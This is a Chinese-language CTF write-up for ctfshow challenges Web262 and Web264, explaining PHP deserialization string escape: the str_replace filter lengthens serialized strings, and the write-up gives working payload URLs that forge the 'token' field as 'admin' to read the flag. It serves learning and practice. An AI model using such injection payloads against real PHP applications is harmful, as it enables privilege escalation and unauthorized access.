ctfshow(262,264)--反序列化漏洞--字符串逃逸

Web262

源代码:

index.php:

复制代码
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

message.php:

复制代码
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }

代码审计:

index.php:

传参f,m,t,实例化message类的对象为msg。

msg序列化 ,并且将序列化字符串中的fuck字符全部替换为loveU字符,赋值给usmg。

setcookie函数设置cookie的名为msg,值为base64编码后的usmg

message.php:

当cookie被成功传入后,对cookie的值进行base64解码与反序列化。
若msg对象中的token值为admin,便输出flag.

思路:

本题我们能控制的参数只有f,m,t.

正常给成员变量赋值之后的序列化字符串是这样的:
若我们给成员变量to赋值为3";s:5:"token";s:5:"admin";},序列化之后是这样:
我们利用这种方式控制了token的值,将其修改为了admin。

但是此时to的值的长度为s:28:,因此在反序列化时还是不会将token的值识别为admin,而是user。

因此,我们要让s:28:"3";的双引号中的字符串数量与前面的数量匹配,就要用到字符串逃逸

函数str_replace('fuck', 'loveU', serialize($msg)) ,将fuck替换为loveU,且是在序列化之后再进行替换,因此只会改变字符串的实际长度,但是不会改变表示字符串长度的数字。

复制代码
// 替换前
s:2:"to";s:4:"fuck";
// 替换后
s:2:"to";s:4:"loveU";

每有一个fuck,双引号里的实际字符长度就可以多一个。
s:28:"3";中,实际长度为1,多出的长度为27个,所以我们添加27个fuck,就可以让数字与实际长度匹配,从而误导系统,将我们输入的token作为成员变量处理。

payload:

复制代码
https://defdd8fc-439a-4f81-86c3-9c304ec64b7f.challenge.ctf.show/
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

EXP:

传入f,m,t:

复制代码
https://defdd8fc-439a-4f81-86c3-9c304ec64b7f.challenge.ctf.show/
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

访问message.php,得到flag.

Web264

源代码:

复制代码
error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

message.php:

复制代码
session_start();
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_SESSION['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

代码审计:

与上一题不同在于将Cookie改为了设置Session。

且message.php页面要求设置Cookie:msg的值,没有要求,随便输入即可。

思路:

与262相同。

EXP:

复制代码
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

然后在Cookie中设置msg=1后,访问message.php,得到flag.

相关推荐
白帽子凯哥哥3 分钟前
渗透测试技术:从入门到实战的完整指南
web安全·渗透测试·人才培养·产教融合·湖南省网安基地
漏洞文库-Web安全10 分钟前
2021qwb [强网先锋]赌徒 Writeup + 环境复现
安全·web安全·网络安全·ctf
这儿有一堆花23 分钟前
凯撒密码:线性偏移与古代加密的数学雏形
安全
admin and root31 分钟前
企业SRC支付漏洞&EDUSRC&众测挖掘思路技巧操作分享
网络·安全·web安全·渗透测试·src漏洞挖掘·网络攻击模型·攻防演练
吕海洋41 分钟前
docker + dependency-check 进行安全扫描
安全·docker·容器
lubiii_1 小时前
Aircrack-ng工具使用原理与实操笔记
开发语言·网络·web安全·php
晚霞的不甘1 小时前
[鸿蒙2025领航者闯关]: Flutter + OpenHarmony 安全开发实战:从数据加密到权限管控的全链路防护
安全·flutter·harmonyos
灰灰勇闯IT1 小时前
[鸿蒙2025领航者闯关] 鸿蒙6.0星盾安全架构实战:打造金融级支付应用的安全防护
安全·harmonyos·安全架构
禁默1 小时前
[鸿蒙2025领航者闯关] 鸿蒙 6 特性实战闯关:金融支付应用的安全升级之路
安全·金融·harmonyos·鸿蒙2025领航者闯关·鸿蒙6实战
张3蜂2 小时前
SQL Server 数据库 的通信加密配置SSL安全连接
数据库·安全·ssl